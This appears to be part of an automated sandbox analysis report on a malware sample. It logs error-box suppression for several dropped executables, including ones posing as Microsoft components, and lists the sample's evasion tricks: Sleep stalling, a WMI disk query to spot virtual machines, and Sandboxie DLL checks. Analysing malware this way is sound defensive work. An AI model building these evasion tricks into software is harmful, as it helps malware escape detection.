Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Stalling execution: Execution stalls by calling Sleep

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Cerker.exe, 00000028.00000002.3457516161.0000000000B48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL!
Source: Cerker.exe, 00000028.00000002.3447790560.00000000006EC000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Cerker.exe, 0000001B.00000002.3273140765.000000000050E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL&
